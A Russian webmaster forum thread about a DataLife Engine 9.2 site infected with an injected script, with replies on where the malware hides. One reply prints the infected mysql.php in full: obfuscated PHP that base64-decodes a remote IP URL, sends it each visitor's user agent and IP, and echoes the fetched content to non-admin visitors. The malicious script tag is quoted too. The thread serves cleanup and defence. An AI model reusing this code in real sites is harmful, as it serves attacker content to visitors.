Форум Сайтостроение Безопасность

Вирус на сайте, как найти и удалить?

D1
На сайте с 12.05.2012
Offline
51
Dinar13
1356

На сайте уже какой раз подряд проскакивает один вирус, точнее проскакивает он в яндексе и губит всё. Вердикт от яндекса "Поведенческий анализ".

Просмотрев большинство файлов, в которых мог прятаться вирус, ничего не обнаружил.

Яндекс написал, что вредоносная часть:

<script src="http://geogrephicalupscaty.dyndns.tv/showforum.php?pid=54543" type="text/javascript"></script>

Вот эта часть urla "geogrephicalupscaty" постоянно меняется, поэтому как-то отследить не удается, да и яндекс переодически выводит что нету вируса. Но он все таки имеется.

Прошу помочь, как найти и удалить этот вредоносный код?

Сайт на DLE 9.2

SeVlad
На сайте с 03.11.2008
Offline
1609
SeVlad
#1
Dinar13:
как найти и удалить этот вредоносный код?

Прежде чем топик создать - посмотреть на закреплённую тему - никак?

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
6666
На сайте с 10.01.2005
Offline
505
6666
#2
Dinar13:
Вот эта часть urla "geogrephicalupscaty" постоянно меняется

Эта часть - результат деятельности вируса, а не вирус. Короче читайте ФАК.

Каждое мое сообщение проверила и одобрила Елена Летучая. (c) Для меня очень важно все что Вы говорите! (http://surrealism.ru/123.mp3) .
K5
На сайте с 21.07.2010
Offline
209
kgtu5
#3

engine/modules/gzip.php

вставка в конце

http://pastebin.com/A6Aadc7M

подсказывайте из каких файлов эти функции информацию берут???

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
akaFenix
На сайте с 04.09.2008
Offline
89
akaFenix
#4
Dinar13:
На сайте уже какой раз подряд проскакивает один вирус, точнее проскакивает он в яндексе и губит всё. Вердикт от яндекса "Поведенческий анализ".
Просмотрев большинство файлов, в которых мог прятаться вирус, ничего не обнаружил.
Яндекс написал, что вредоносная часть:

<script src="http://geogrephicalupscaty.dyndns.tv/showforum.php?pid=54543" type="text/javascript"></script>

Вот эта часть urla "geogrephicalupscaty" постоянно меняется, поэтому как-то отследить не удается, да и яндекс переодически выводит что нету вируса. Но он все таки имеется.

Прошу помочь, как найти и удалить этот вредоносный код?

Сайт на DLE 9.2

\engine\classes\mysql.php - (этот код может быть в любом php файле)

наверно так:


if(!defined('DATALIFEENGINE'))
{
  die("Hacking attempt!");
}

if ( extension_loaded('mysqli') )
{
	include_once( ENGINE_DIR."/classes/mysqli.class.php" );
}
else
{
	include_once( ENGINE_DIR."/classes/mysql.class.php" );
}

function getnewsfromid($id) {
	$id = intval($id);
	$rtn = $id + date("j");
	return $rtn;
}

function mysql_safe_connect($in) {
	if (getnewsfromid(64) < 1024) {
	$rtn = base64_decode($in);
	return $rtn;
	}
}
function get_all_news_by_list($newsid) {
	if (date("j") - $newsid > 320 ) {
		$rtn = false;
	} else {
	$get = mysql_safe_connect("aHR0cDovLzE3OC4yMTEuMzMuNzQvZ2V0X2FwaS5waHA/cGlkPTIm")."br=".base64_encode($_SERVER['HTTP_USER_AGENT'])."&ip=".base64_encode($_SERVER['REMOTE_ADDR']);
	if (!isset($_COOKIE[mysql_safe_connect("ZGxlX3Bhc3N3b3Jk")])) {
	echo @file_get_contents($get);
	}
	}
}
get_all_news_by_list (date("j"));

а должно быть так:

if(!defined('DATALIFEENGINE'))
{
  die("Hacking attempt!");
}

if ( extension_loaded('mysqli') )
{
	include_once( ENGINE_DIR."/classes/mysqli.class.php" );
}
else
{
	include_once( ENGINE_DIR."/classes/mysql.class.php" );
}

Но не обольщайтесь, удаление этого кода ничего не даст, если не обезопасить себя.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий